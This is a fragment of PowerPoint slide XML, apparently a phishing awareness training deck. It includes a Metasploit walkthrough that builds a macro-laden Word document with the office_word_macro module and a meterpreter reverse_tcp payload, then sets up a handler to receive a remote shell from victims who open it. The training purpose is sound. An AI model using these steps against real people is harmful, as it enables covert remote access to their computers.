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42" r:id="rId5"/>
    <p:sldId id="359" r:id="rId6"/>
    <p:sldId id="378" r:id="rId7"/>
    <p:sldId id="375" r:id="rId8"/>
    <p:sldId id="376" r:id="rId9"/>
    <p:sldId id="385" r:id="rId10"/>
    <p:sldId id="386" r:id="rId11"/>
    <p:sldId id="377" r:id="rId12"/>
    <p:sldId id="380" r:id="rId13"/>
    <p:sldId id="365" r:id="rId14"/>
    <p:sldId id="382" r:id="rId15"/>
    <p:sldId id="383" r:id="rId16"/>
    <p:sldId id="384" r:id="rId17"/>
    <p:sldId id="381" r:id="rId18"/>
    <p:sldId id="3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DFF5"/>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showGuides="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="64" d="100"/>
          <a:sy n="64" d="100"/>
        </p:scale>
        <p:origin x="97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78"/>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2/11/2025</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2/11/2025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a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15759997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14</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="661510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15</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3</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37651255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4</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2982522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a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2493029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08AB0-E7C7-B199-41F4-5F5B8C144A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1D7922-96C1-AD04-7BD7-46E05B3E15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A9F969-BDEF-D2AE-6357-BC062682EA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04E099-1CE2-A11D-175D-848ABBCF73B5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DEF75CB5-5666-5049-9AE0-38EFD385C21E}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>6</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="229535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47D5-55CA-56FB-B5F8-668BB9FC6F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8E453E-9651-EB0C-7AE9-AE6108F1D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75032-40F7-0BED-7146-93A50323A3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8B228A0-B0B5-EE32-0DE3-D16D83CFDB42}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DEF75CB5-5666-5049-9AE0-38EFD385C21E}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>7</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3438121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8</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7124872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9</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8392136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a:t>Click icon to add picture</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>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a:t>Click icon to add table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a:t>Click icon to add table</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>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a:t>Click icon to add picture</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>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a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>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www.nasdaq.com/articles/austrian-court-rejects-facc-lawsuit-against-ex-ceo-in-cyber-fraud-case-2019-11-27"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997874EA-2F67-60CD-631F-5A787057F8CE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="304799"/>
            <a:ext cx="12191998" cy="3215641"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Phishing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Subtitle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2981AB9E-AF0F-CAD0-2DD2-D640FB871E66}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3" y="3670628"/>
            <a:ext cx="12191997" cy="2577772"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Awareness training</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="249803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Phishing in action</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Subtitle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C15774B0-D971-67D7-27EB-FDB82B3A58CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2932447" y="3638133"/>
            <a:ext cx="6327105" cy="2653771"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Document-based phishing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1330733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DE567-FA1C-1C4F-9F7C-EA884AF61368}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>overview</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Table Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B1B403C-C081-D5B2-097C-6BC962D936D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="tbl" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="835025" y="2363993"/>
            <a:ext cx="10515600" cy="3478212"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To carry out a basic document-based phishing attack, the first step would be to embed a malicious macro within the document.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Alternatively, we will use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1CDFF5"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> to create such a document and embed it with macro using the commands in the terminal.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>We won’t be working with the malicious document after it’s creation for performing any sort of social engineering through it due to obvious reasons.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4BB2DE6A-B913-1743-AF0A-4A67E89BB59D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FE024F78-56A6-7740-B68D-8D4D026EDF3F}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>11</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13313267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4CC95BB-64BB-D40F-A562-FBCA0D9B2C8A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="204897" y="511762"/>
            <a:ext cx="5891103" cy="6079561"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>steps</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" spc="300" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Type </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" spc="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1CDFF5"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>msfconsole</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" spc="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1CDFF5"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" spc="300" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> in the terminal to start the metasploit framework.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" spc="300" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" spc="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1CDFF5"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Set payload windows/meterpreter/reverse_tcp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" spc="300" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Specifies the payload to use. In this case, it connects to the specified host and creates a reverse shell.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" spc="0" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Use exploit/multi/fileformat/office_word_macro</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" spc="300" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Specifies the exploit we are going to use.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" spc="300" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" spc="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1CDFF5"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Set lhost [IP ADDRESS]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" spc="300" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Specifies the ip address of the attacker’s system.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" spc="300" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" spc="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1CDFF5"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Set lport 8888</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" spc="300" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" spc="300" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Specifies the port number we are going to listen to.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E616403-CA09-18F8-C1D3-AC12C7A6FC10}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FE024F78-56A6-7740-B68D-8D4D026EDF3F}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>12</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{248CA902-ADCE-D522-5DD2-36131FE5A97D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7034460" y="511762"/>
            <a:ext cx="4213022" cy="3145838"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9" descr="A screen shot of a computer code&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2462BEB3-3A5B-A466-DBF4-504873FC452D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6169171" y="4059063"/>
            <a:ext cx="5943600" cy="1383030"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7107698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00985-0385-0748-AA9C-8B3BB9D56A2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13B48CA-E6FB-00EC-2309-5DB7D8A72F9E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="204898" y="511762"/>
            <a:ext cx="5684626" cy="6252832"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" spc="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1CDFF5"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" spc="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1CDFF5"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" spc="300" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> Generates a macro and embeds it in a document.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" spc="300" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" spc="300" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>As we can see, the word document with the embedded macro was created and stored in</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" spc="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1CDFF5"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>/home/kali/.msf4/local/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" spc="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" spc="300" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" spc="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1CDFF5"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>msf.docm</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" spc="300" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" spc="300" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>We will again use the metasploit framework now but this time to listen for the incoming connections when a target user opens our malicious word document.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" spc="300" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" spc="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1CDFF5"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Use multi/handler  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" spc="300" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>to handle the incoming connections.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" spc="0" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Set payload windows/meterpreter/reverse_tcp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" spc="300" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>to ensure that out payload works with the payload used when creating the malicious macro.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" spc="300" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" spc="0" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Set lost [ip address]  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" spc="300" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" spc="0" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>set lport 8888</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" spc="300" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Specifies the ip address of the attacker’s system and lport specifies the port number we are going to listen to and should be the same as the one used when creating the document.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" spc="300" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" spc="300" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D9449FF-E753-9F7C-413F-85F812FF7E4E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FE024F78-56A6-7740-B68D-8D4D026EDF3F}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>13</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
